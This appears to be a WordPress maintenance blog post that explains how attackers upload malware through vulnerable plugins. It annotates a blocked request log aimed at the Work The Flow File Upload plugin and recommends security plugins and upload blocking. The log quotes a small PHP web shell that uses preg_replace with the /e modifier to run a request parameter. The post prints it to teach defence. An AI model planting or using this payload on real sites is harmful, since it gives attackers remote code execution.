One of the most common hacker techniques on WordPress sites is to find a plugin that has a vulnerability, and use that plugin to upload an initial malware file onto your site. The hackers would then access the malware file directly (bypassing WordPress) to install any malware they want, and/or access your database. Hackers know the most common place plugins would put uploaded files is in your WordPress wp-content/uploads/ folder.

You Must Protect Your Uploads Folder

This is a serious security issue. One reason you must do plugin updates frequently, is plugin authors (well, the good ones, at least) will patch security issues as soon as anyone informs them. There are security people who check the hacker’s bulletin boards for issues the hackers are bragging about, and alert the plugin authors.

Here is an example of the kind of hacker junk you would see if your security software were capturing the information:

errorstatus errortrigger requri querystring useragent cookies allowheaders postvariables
403 badRequestString:wpcontent /wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/index.php Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0 Accept: */* Accept-Encoding: gzip, deflate –31aa900beb174efa942c7958119e7885
Content-Disposition:_form-data;_name–>”action”upload
–31aa900beb174efa942c7958119e7885
Content-Disposition: form-data; name=”files”; filename=”wp-classes.php”
Content-Type: text/plain–31aa900beb174efa942c7958119e7885–
403 badRequestString:wpcontent /wp-content/plugins/work-the-flow-file-upload/public/assets/jQuery-File-Upload-9.5.0/server/php/index.php Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0 Accept: */* Accept-Encoding: gzip, deflate –f2ee98a757e94b9897a2c9b1a9ffa74f
Content-Disposition:_form-data;_name–>”action”upload
–f2ee98a757e94b9897a2c9b1a9ffa74f
Content-Disposition: form-data; name=”files”; filename=”wp-classes.php”
Content-Type: text/plain<?php if (!isset($_REQUEST[‘e44e’])) header(“HTTP/1.0 404 Not Found”); @preg_replace(‘/(.*)/e’, @$_REQUEST[‘e44e’], ”); ?>
–f2ee98a757e94b9897a2c9b1a9ffa74f–

What Do These Columns Mean?

ErrorStatus 403 means “Forbidden”, the server or hosting account security rules are blocking this. ErrorStatus 404 means “File Not Found”, but there is nothing forbidding them accessing the file if it did exist.

(If the requested file did exist, the hackers would have found a file that, at least in some version of the file, they think had a vulnerability; you wouldn’t see an error. Your site access log would have the file name with an ErrorStatus 200 “OK”, or 304 “Not Modified”.)

ErrorTrigger is my security system letting me know what caused this to be blocked, in this case the use of “wp-content” in the Request String.

Requri is the Request String, in this case beginning with “/wp-content/plugins/work-the-flow-file-upload”. So we guess that some version of the “Work The Flow File Upload” plugin had a vulnerability (because somebody, probably a hacker, was looking for it). We don’t know that the current version of the plugin is flawed, we know that hackers are interested in some version of the plugin.

This plugin looks risky, in the description at https://wordpress.org/plugins/work-the-flow-file-upload/faq/ However, know that any plugin author can mess up and allow a hacker to gain access beyond the plugin author’s intentions.

You want to specifically block hacker behavior, not attempt to guess whether the plugin author is to be trusted. This behavior of uploading a file, that isn’t an image or music or other “good” file type, is to be blocked.

In this example, simply the attempt to access program files directly in wp-content/ is enough to conclude the request is by a hacker. Only images or music or video should ever be accessible directly, in wp-content/ or any sub-folders.

Query String is, in these examples, not used. If you type a URL in, and it has a question mark in it, everything after the question mark is the query string. For the URL http://computerhelp.glerner.com/wp-admin/post.php?post=abcde&action=edit the query string is “post=abcde&action=edit”.

User Agent is used by all software that accesses web pages, letting the server know what capabilities or special formatting to use. Some hackers use web bots with unique names, “bragging” about who they are; these can be blocked by security rules forbidding the user agent. In this case, it’s simply Firefox version 34. If there is the word “semalt” or “nutch” or “ImageSucker” in the User Agent, those are known baddies. You can find several lists of user agents, e.g. http://www.useragentstring.com

Cookies aren’t set here. Hmm, if they were actually using WordPress, there would be several cookies set. So, this is another clue they are hackers.

Allow Headers: These are meant to be used to let the server know what language the browser prefers, for example “I want to read French version of the page if you have one, but if not I’ll take British English or any other version of English”. Similarly, the header is used to indicate if the browser can take compressed output. In this case, no foreign language preferences, and can use gzip or deflate for compression. Nothing to look at here, in this example, for security; this is useful for troubleshooting other types of problems.

Post Variables: Every form you fill out on the Internet uses Post Variables (or rarely, the URL) to submit the data. In this case, the “Action” is “Upload” (the hacker is submitting a file for the server to upload), and the file name is “wp-classes.php”. Well, that looks like a legitimate file name, right? Wrong! This is being uploaded, which is a definite give-away, but if you didn’t catch the upload the hackers are hoping you won’t notice a file with a name that looks legitimate.

What is that “<?php if (!isset($_REQUEST[‘e44e’]))…” stuff in the last example row? They are testing and trying to execute something. POST data should never contain PHP code. Even if you have a site that might have legitimate comments about PHP programming, make the visitors enclose their code in PHPSTART and PHPEND (literally that text, which actual programmers reading your site would understand should be replaced with the actual characters <? and ?> ); and of course keep those comments held for approval before showing them. No PHP, JavaScript, or any other scripts, should ever be allowed in Post variables.

How Do I Block Files Uploaded to wp-content/

The easiest way is use a good security plugin such as iThemes Security or WordFence. I’m using iThemes Security, for years, and hear from other experts in the WordPress Meetups that WordFence is also excellent. Both will do far more than block uploading executable files and block executing files in wp-content. Definitely use either iThemes Security or WordFence!

If you want to modify your own .htaccess file? Don’t, it’s a lot more work! Okay, if you really want to, here’s what I use, including setting a server environment variable that my error page can read:

I make exceptions for style sheets and images and fonts in your theme folders and plugin folders; and for images, pdf files, text files, movies in your WordPress uploads folder (the WordPress Media Library folder). I also allow Cache plugin files.

Want Me to Check Your Security and Maintenance?

I do WordPress Ongoing Maintenance and Security for small business sites, making sure your site runs smoothly and is safe from most hackers. I can’t block the CIA (or Russian, Chinese, etc equivalent) from getting in, but I can thwart many hacking attempts. I can have your site run quickly, and without errors. I can make sure your pages are showing up well in social media sites, including Facebook, Twitter, LinkedIn, Pinterest.

Pin It on Pinterest

Share This